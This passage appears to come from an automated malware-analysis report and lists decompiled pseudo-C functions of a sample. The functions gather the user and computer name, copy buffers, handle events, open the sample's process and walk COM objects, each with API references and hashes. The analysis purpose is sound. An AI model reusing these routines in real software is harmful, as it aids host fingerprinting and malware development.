                                                                                                                                                                                                                                          					if(_t43 != 0) {
                                                                                                                                                                                                                                          						_v12 = _v12 + _t43 + 2;
                                                                                                                                                                                                                                          						_t64 = E011258BE(_v12 + _t43 + 2 << 2);
                                                                                                                                                                                                                                          						if(_t64 != 0) {
                                                                                                                                                                                                                                          							_t47 = _v12;
                                                                                                                                                                                                                                          							_t67 = _t64 + _t47 * 2;
                                                                                                                                                                                                                                          							_v8 = _t47;
                                                                                                                                                                                                                                          							if(GetUserNameW(_t67,  &_v8) == 0) {
                                                                                                                                                                                                                                          								L7:
                                                                                                                                                                                                                                          								E0112147E(_t64);
                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                          								_t51 = 0x40;
                                                                                                                                                                                                                                          								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                                                                                                                                                                                                                          								_t52 = _v8;
                                                                                                                                                                                                                                          								_v12 = _v12 - _t52;
                                                                                                                                                                                                                                          								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                                                                                                                                                                                                                          									goto L7;
                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                          									_t56 = _v12 + _v8;
                                                                                                                                                                                                                                          									_t31 = _t56 + 2; // 0x1125210
                                                                                                                                                                                                                                          									_v12 = _t56;
                                                                                                                                                                                                                                          									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                                                                                                                                                                                                                          									_v8 = _t57;
                                                                                                                                                                                                                                          									if(_t57 == 0) {
                                                                                                                                                                                                                                          										goto L7;
                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                          										_t64[_t57] = 0;
                                                                                                                                                                                                                                          										_v16 = _t64;
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return _v16;
                                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                                          0x01126158
                                                                                                                                                                                                                                          0x0112615b
                                                                                                                                                                                                                                          0x0112615e
                                                                                                                                                                                                                                          0x01126164
                                                                                                                                                                                                                                          0x01126169
                                                                                                                                                                                                                                          0x0112616f
                                                                                                                                                                                                                                          0x01126177
                                                                                                                                                                                                                                          0x0112617a
                                                                                                                                                                                                                                          0x01126180
                                                                                                                                                                                                                                          0x01126185
                                                                                                                                                                                                                                          0x01126192
                                                                                                                                                                                                                                          0x0112619f
                                                                                                                                                                                                                                          0x011261a3
                                                                                                                                                                                                                                          0x011261a5
                                                                                                                                                                                                                                          0x011261a9
                                                                                                                                                                                                                                          0x011261ac
                                                                                                                                                                                                                                          0x011261bc
                                                                                                                                                                                                                                          0x0112620f
                                                                                                                                                                                                                                          0x01126210
                                                                                                                                                                                                                                          0x011261be
                                                                                                                                                                                                                                          0x011261c3
                                                                                                                                                                                                                                          0x011261c4
                                                                                                                                                                                                                                          0x011261c9
                                                                                                                                                                                                                                          0x011261cc
                                                                                                                                                                                                                                          0x011261df
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x011261e1
                                                                                                                                                                                                                                          0x011261e4
                                                                                                                                                                                                                                          0x011261e9
                                                                                                                                                                                                                                          0x011261f7
                                                                                                                                                                                                                                          0x011261fa
                                                                                                                                                                                                                                          0x01126200
                                                                                                                                                                                                                                          0x01126205
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01126207
                                                                                                                                                                                                                                          0x01126207
                                                                                                                                                                                                                                          0x0112620a
                                                                                                                                                                                                                                          0x0112620a
                                                                                                                                                                                                                                          0x01126205
                                                                                                                                                                                                                                          0x011261df
                                                                                                                                                                                                                                          0x01126215
                                                                                                                                                                                                                                          0x01126216
                                                                                                                                                                                                                                          0x01126185
                                                                                                                                                                                                                                          0x0112621c

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetUserNameW.ADVAPI32(00000000,0112520E), ref: 0112615E
                                                                                                                                                                                                                                          • GetComputerNameW.KERNEL32(00000000,0112520E), ref: 0112617A
                                                                                                                                                                                                                                            • Part of subcall function 011258BE: RtlAllocateHeap.NTDLL(00000000,-00000008,01121C51), ref: 011258CA
                                                                                                                                                                                                                                          • GetUserNameW.ADVAPI32(00000000,0112520E), ref: 011261B4
                                                                                                                                                                                                                                          • GetComputerNameW.KERNEL32(0112520E,?), ref: 011261D7
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,0112520E,00000000,01125210,00000000,00000000,?,?,0112520E), ref: 011261FA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3850880919-0
                                                                                                                                                                                                                                          • Opcode ID: ad084bf4600bf8d3117c18f792130c5d58832722b066c272d58e56d366828f57
                                                                                                                                                                                                                                          • Instruction ID: bb84200a02e224478c0983b0f327fdeb544d38a3f5c0dd5f846c004dc101594d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad084bf4600bf8d3117c18f792130c5d58832722b066c272d58e56d366828f57
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F212DB6900118FFDB25DFE8D984DEEBBBDEF55204B1044AAEA01E7241E7349B54CB50
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                                                                          			E011262CD(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                          				char _t28;
                                                                                                                                                                                                                                          				void* _t36;
                                                                                                                                                                                                                                          				void* _t41;
                                                                                                                                                                                                                                          				char* _t42;
                                                                                                                                                                                                                                          				void* _t44;
                                                                                                                                                                                                                                          				void* _t49;
                                                                                                                                                                                                                                          				void* _t50;
                                                                                                                                                                                                                                          				int _t51;
                                                                                                                                                                                                                                          				int _t54;
                                                                                                                                                                                                                                          				void* _t55;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t49 = _a4;
                                                                                                                                                                                                                                          				_t55 = __eax;
                                                                                                                                                                                                                                          				_v12 = 0xb;
                                                                                                                                                                                                                                          				if(_t49 != 0 && __eax != 0) {
                                                                                                                                                                                                                                          					_t5 = _t55 - 1; // -1
                                                                                                                                                                                                                                          					_t42 = _t49 + _t5;
                                                                                                                                                                                                                                          					_t28 =  *_t42;
                                                                                                                                                                                                                                          					_v5 = _t28;
                                                                                                                                                                                                                                          					 *_t42 = 0;
                                                                                                                                                                                                                                          					__imp__(_a8, _t41);
                                                                                                                                                                                                                                          					_v16 = _t28;
                                                                                                                                                                                                                                          					_t50 =  *0x112d114(_t49, _a8);
                                                                                                                                                                                                                                          					if(_t50 != 0) {
                                                                                                                                                                                                                                          						 *_t42 = _v5;
                                                                                                                                                                                                                                          						_t44 = RtlAllocateHeap( *0x112d238, 0, _a16 + __eax);
                                                                                                                                                                                                                                          						if(_t44 == 0) {
                                                                                                                                                                                                                                          							_v12 = 8;
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							_t51 = _t50 - _a4;
                                                                                                                                                                                                                                          							memcpy(_t44, _a4, _t51);
                                                                                                                                                                                                                                          							_t36 = memcpy(_t44 + _t51, _a12, _a16);
                                                                                                                                                                                                                                          							_t45 = _v16;
                                                                                                                                                                                                                                          							_t54 = _a16;
                                                                                                                                                                                                                                          							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
                                                                                                                                                                                                                                          							 *_a20 = _t44;
                                                                                                                                                                                                                                          							_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                          							 *_a24 = _t55 - _v16 + _t54;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return _v12;
                                                                                                                                                                                                                                          			}
















                                                                                                                                                                                                                                          0x011262d5
                                                                                                                                                                                                                                          0x011262d8
                                                                                                                                                                                                                                          0x011262da
                                                                                                                                                                                                                                          0x011262e3
                                                                                                                                                                                                                                          0x011262f5
                                                                                                                                                                                                                                          0x011262f5
                                                                                                                                                                                                                                          0x011262f9
                                                                                                                                                                                                                                          0x011262fb
                                                                                                                                                                                                                                          0x011262fe
                                                                                                                                                                                                                                          0x01126301
                                                                                                                                                                                                                                          0x0112630a
                                                                                                                                                                                                                                          0x01126314
                                                                                                                                                                                                                                          0x01126318
                                                                                                                                                                                                                                          0x0112631d
                                                                                                                                                                                                                                          0x01126333
                                                                                                                                                                                                                                          0x01126337
                                                                                                                                                                                                                                          0x01126388
                                                                                                                                                                                                                                          0x01126339
                                                                                                                                                                                                                                          0x01126339
                                                                                                                                                                                                                                          0x01126341
                                                                                                                                                                                                                                          0x01126350
                                                                                                                                                                                                                                          0x01126355
                                                                                                                                                                                                                                          0x01126365
                                                                                                                                                                                                                                          0x0112636b
                                                                                                                                                                                                                                          0x01126376
                                                                                                                                                                                                                                          0x01126380
                                                                                                                                                                                                                                          0x01126384
                                                                                                                                                                                                                                          0x01126384
                                                                                                                                                                                                                                          0x01126337
                                                                                                                                                                                                                                          0x0112638f
                                                                                                                                                                                                                                          0x01126396

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 01126301
                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0112632D
                                                                                                                                                                                                                                          • memcpy.NTDLL(00000000,0000000B,0000000B), ref: 01126341
                                                                                                                                                                                                                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 01126350
                                                                                                                                                                                                                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 0112636B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1819133394-0
                                                                                                                                                                                                                                          • Opcode ID: 42a7b3810f44d10972e42b059bbf0cc82e8feddeb11187b24049a52f87f9dda7
                                                                                                                                                                                                                                          • Instruction ID: 7cf9c9bf7f06defcf66ab6d9984048658e54e0cfb5a11c898540817243e5f4c0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42a7b3810f44d10972e42b059bbf0cc82e8feddeb11187b24049a52f87f9dda7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF21AE36900219AFDF119FA8C844AEEBF79EF85304F058054ED54AB304D730E924CBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                                                                          			E01129FE7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                          				long _t10;
                                                                                                                                                                                                                                          				void* _t18;
                                                                                                                                                                                                                                          				void* _t22;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t9 = __eax;
                                                                                                                                                                                                                                          				_t22 = __eax;
                                                                                                                                                                                                                                          				if(_a4 != 0 && E01126B6E(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                                                                                                                                                                                                                          					L9:
                                                                                                                                                                                                                                          					return GetLastError();
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t10 = E0112A96C(_t9, _t18, _t22, _a8);
                                                                                                                                                                                                                                          				if(_t10 == 0) {
                                                                                                                                                                                                                                          					ResetEvent( *(_t22 + 0x1c));
                                                                                                                                                                                                                                          					ResetEvent( *(_t22 + 0x20));
                                                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                                                          					_push(0xffffffff);
                                                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                                                          					_push( *((intOrPtr*)(_t22 + 0x18)));
                                                                                                                                                                                                                                          					if( *0x112d12c() != 0) {
                                                                                                                                                                                                                                          						SetEvent( *(_t22 + 0x1c));
                                                                                                                                                                                                                                          						goto L7;
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						_t10 = GetLastError();
                                                                                                                                                                                                                                          						if(_t10 == 0x3e5) {
                                                                                                                                                                                                                                          							L7:
                                                                                                                                                                                                                                          							_t10 = 0;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				if(_t10 == 0xffffffff) {
                                                                                                                                                                                                                                          					goto L9;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return _t10;
                                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                                          0x01129fe7
                                                                                                                                                                                                                                          0x01129ff4
                                                                                                                                                                                                                                          0x01129ff6
                                                                                                                                                                                                                                          0x0112a059
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112a059
                                                                                                                                                                                                                                          0x0112a00e
                                                                                                                                                                                                                                          0x0112a015
                                                                                                                                                                                                                                          0x0112a021
                                                                                                                                                                                                                                          0x0112a026
                                                                                                                                                                                                                                          0x0112a028
                                                                                                                                                                                                                                          0x0112a02a
                                                                                                                                                                                                                                          0x0112a02c
                                                                                                                                                                                                                                          0x0112a02e
                                                                                                                                                                                                                                          0x0112a030
                                                                                                                                                                                                                                          0x0112a03c
                                                                                                                                                                                                                                          0x0112a04c
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112a03e
                                                                                                                                                                                                                                          0x0112a03e
                                                                                                                                                                                                                                          0x0112a045
                                                                                                                                                                                                                                          0x0112a052
                                                                                                                                                                                                                                          0x0112a052
                                                                                                                                                                                                                                          0x0112a052
                                                                                                                                                                                                                                          0x0112a045
                                                                                                                                                                                                                                          0x0112a03c
                                                                                                                                                                                                                                          0x0112a057
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112a05d

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,011266AF,?,?,00000000,00000000), ref: 0112A021
                                                                                                                                                                                                                                          • ResetEvent.KERNEL32(?), ref: 0112A026
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0112A03E
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000102,011266AF,?,?,00000000,00000000), ref: 0112A059
                                                                                                                                                                                                                                            • Part of subcall function 01126B6E: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,0112A006,?,?,?,?,00000102,011266AF,?,?,00000000), ref: 01126B7A
                                                                                                                                                                                                                                            • Part of subcall function 01126B6E: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0112A006,?,?,?,?,00000102,011266AF,?), ref: 01126BD8
                                                                                                                                                                                                                                            • Part of subcall function 01126B6E: lstrcpy.KERNEL32(00000000,00000000), ref: 01126BE8
                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 0112A04C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1449191863-0
                                                                                                                                                                                                                                          • Opcode ID: 9c37d8b06e7bfbe244f1d9799aa5e1108308ed85f58d6ada60daa55d82558cf0
                                                                                                                                                                                                                                          • Instruction ID: b21dc11e24976976e1d88492fd5b66b0bffa3353da764990488c0bb1e7e8e1df
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c37d8b06e7bfbe244f1d9799aa5e1108308ed85f58d6ada60daa55d82558cf0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D01F231100220ABDA352E35FC04F4BBBA4FF44364F104A34F790A28E0D729D834D768
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                          			E01126A7F(intOrPtr _a4) {
                                                                                                                                                                                                                                          				void* _t2;
                                                                                                                                                                                                                                          				unsigned int _t4;
                                                                                                                                                                                                                                          				void* _t5;
                                                                                                                                                                                                                                          				long _t6;
                                                                                                                                                                                                                                          				void* _t7;
                                                                                                                                                                                                                                          				void* _t15;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t2 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                          				 *0x112d26c = _t2;
                                                                                                                                                                                                                                          				if(_t2 == 0) {
                                                                                                                                                                                                                                          					return GetLastError();
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t4 = GetVersion();
                                                                                                                                                                                                                                          				if(_t4 != 5) {
                                                                                                                                                                                                                                          					L4:
                                                                                                                                                                                                                                          					if(_t15 <= 0) {
                                                                                                                                                                                                                                          						_t5 = 0x32;
                                                                                                                                                                                                                                          						return _t5;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                                                          					 *0x112d25c = _t4;
                                                                                                                                                                                                                                          					_t6 = GetCurrentProcessId();
                                                                                                                                                                                                                                          					 *0x112d258 = _t6;
                                                                                                                                                                                                                                          					 *0x112d264 = _a4;
                                                                                                                                                                                                                                          					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                                                                                                                                                                                                          					 *0x112d254 = _t7;
                                                                                                                                                                                                                                          					if(_t7 == 0) {
                                                                                                                                                                                                                                          						 *0x112d254 =  *0x112d254 | 0xffffffff;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				if(_t4 >> 8 > 0) {
                                                                                                                                                                                                                                          					goto L5;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t15 = _t4 - _t4;
                                                                                                                                                                                                                                          				goto L4;
                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                          0x01126a87
                                                                                                                                                                                                                                          0x01126a8d
                                                                                                                                                                                                                                          0x01126a94
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01126aee
                                                                                                                                                                                                                                          0x01126a96
                                                                                                                                                                                                                                          0x01126a9e
                                                                                                                                                                                                                                          0x01126aab
                                                                                                                                                                                                                                          0x01126aab
                                                                                                                                                                                                                                          0x01126aeb
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01126aeb
                                                                                                                                                                                                                                          0x01126aad
                                                                                                                                                                                                                                          0x01126aad
                                                                                                                                                                                                                                          0x01126ab2
                                                                                                                                                                                                                                          0x01126ac4
                                                                                                                                                                                                                                          0x01126ac9
                                                                                                                                                                                                                                          0x01126acf
                                                                                                                                                                                                                                          0x01126ad5
                                                                                                                                                                                                                                          0x01126adc
                                                                                                                                                                                                                                          0x01126ade
                                                                                                                                                                                                                                          0x01126ade
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01126ae5
                                                                                                                                                                                                                                          0x01126aa7
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01126aa9
                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,011290D2,?), ref: 01126A87
                                                                                                                                                                                                                                          • GetVersion.KERNEL32 ref: 01126A96
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 01126AB2
                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 01126ACF
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 01126AEE
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2270775618-0
                                                                                                                                                                                                                                          • Opcode ID: 3532d2c49bcf02d7c730ab55a369cf2814bee579b007295c5ac00f20f305864e
                                                                                                                                                                                                                                          • Instruction ID: ebcd9d888e0b4210d59db869c89195f649f4061e3f70a816cb3440becd8da6c6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3532d2c49bcf02d7c730ab55a369cf2814bee579b007295c5ac00f20f305864e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2F08174640302BBDB3C8FAAFC09B193B60A746751F00803AEA62D61C8D774C4B1CB5A
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 46%
                                                                                                                                                                                                                                          			E011291B5(intOrPtr* __eax) {
                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                          				WCHAR* _v12;
                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                          				short _v48;
                                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                                          				short _v64;
                                                                                                                                                                                                                                          				intOrPtr* _t54;
                                                                                                                                                                                                                                          				intOrPtr* _t56;
                                                                                                                                                                                                                                          				intOrPtr _t57;
                                                                                                                                                                                                                                          				intOrPtr* _t58;
                                                                                                                                                                                                                                          				intOrPtr* _t60;
                                                                                                                                                                                                                                          				void* _t61;
                                                                                                                                                                                                                                          				intOrPtr* _t63;
                                                                                                                                                                                                                                          				intOrPtr* _t65;
                                                                                                                                                                                                                                          				short _t67;
                                                                                                                                                                                                                                          				intOrPtr* _t68;
                                                                                                                                                                                                                                          				intOrPtr* _t70;
                                                                                                                                                                                                                                          				intOrPtr* _t72;
                                                                                                                                                                                                                                          				intOrPtr* _t75;
                                                                                                                                                                                                                                          				intOrPtr* _t77;
                                                                                                                                                                                                                                          				intOrPtr _t79;
                                                                                                                                                                                                                                          				intOrPtr* _t83;
                                                                                                                                                                                                                                          				intOrPtr* _t87;
                                                                                                                                                                                                                                          				intOrPtr _t103;
                                                                                                                                                                                                                                          				intOrPtr _t109;
                                                                                                                                                                                                                                          				void* _t118;
                                                                                                                                                                                                                                          				void* _t122;
                                                                                                                                                                                                                                          				void* _t123;
                                                                                                                                                                                                                                          				intOrPtr _t130;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t123 = _t122 - 0x3c;
                                                                                                                                                                                                                                          				_push( &_v8);
                                                                                                                                                                                                                                          				_push(__eax);
                                                                                                                                                                                                                                          				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                                                                                                                                                                                                                          				if(_t118 >= 0) {
                                                                                                                                                                                                                                          					_t54 = _v8;
                                                                                                                                                                                                                                          					_t103 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          					_t5 = _t103 + 0x112e038; // 0x3050f485
                                                                                                                                                                                                                                          					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                                                                                                                                                                                                          					_t56 = _v8;
                                                                                                                                                                                                                                          					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                                                                                                                                                                                                          					if(_t118 >= 0) {
                                                                                                                                                                                                                                          						__imp__#2(0x112c298);
                                                                                                                                                                                                                                          						_v28 = _t57;
                                                                                                                                                                                                                                          						if(_t57 == 0) {
                                                                                                                                                                                                                                          							_t118 = 0x8007000e;
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							_t60 = _v32;
                                                                                                                                                                                                                                          							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                                                                                                                                                                                                          							_t87 = __imp__#6;
                                                                                                                                                                                                                                          							_t118 = _t61;
                                                                                                                                                                                                                                          							if(_t118 >= 0) {
                                                                                                                                                                                                                                          								_t63 = _v24;
                                                                                                                                                                                                                                          								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                                                                                                                                                                                                          								if(_t118 >= 0) {
                                                                                                                                                                                                                                          									_t130 = _v20;
                                                                                                                                                                                                                                          									if(_t130 != 0) {
                                                                                                                                                                                                                                          										_t67 = 3;
                                                                                                                                                                                                                                          										_v64 = _t67;
                                                                                                                                                                                                                                          										_v48 = _t67;
                                                                                                                                                                                                                                          										_v56 = 0;
                                                                                                                                                                                                                                          										_v40 = 0;
                                                                                                                                                                                                                                          										if(_t130 > 0) {
                                                                                                                                                                                                                                          											while(1) {
                                                                                                                                                                                                                                          												_t68 = _v24;
                                                                                                                                                                                                                                          												asm("movsd");
                                                                                                                                                                                                                                          												asm("movsd");
                                                                                                                                                                                                                                          												asm("movsd");
                                                                                                                                                                                                                                          												asm("movsd");
                                                                                                                                                                                                                                          												_t123 = _t123;
                                                                                                                                                                                                                                          												asm("movsd");
                                                                                                                                                                                                                                          												asm("movsd");
                                                                                                                                                                                                                                          												asm("movsd");
                                                                                                                                                                                                                                          												asm("movsd");
                                                                                                                                                                                                                                          												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                                                                                                                                                                                                                          												if(_t118 < 0) {
                                                                                                                                                                                                                                          													goto L16;
                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                          												_t70 = _v8;
                                                                                                                                                                                                                                          												_t109 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          												_t28 = _t109 + 0x112e0bc; // 0x3050f1ff
                                                                                                                                                                                                                                          												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                                                                                                                                                                                                                          												if(_t118 >= 0) {
                                                                                                                                                                                                                                          													_t75 = _v16;
                                                                                                                                                                                                                                          													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                                                                                                                                                                                                                          													if(_t118 >= 0 && _v12 != 0) {
                                                                                                                                                                                                                                          														_t79 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          														_t33 = _t79 + 0x112e078; // 0x76006f
                                                                                                                                                                                                                                          														if(lstrcmpW(_v12, _t33) == 0) {
                                                                                                                                                                                                                                          															_t83 = _v16;
                                                                                                                                                                                                                                          															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                          														 *_t87(_v12);
                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                          													_t77 = _v16;
                                                                                                                                                                                                                                          													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                          												_t72 = _v8;
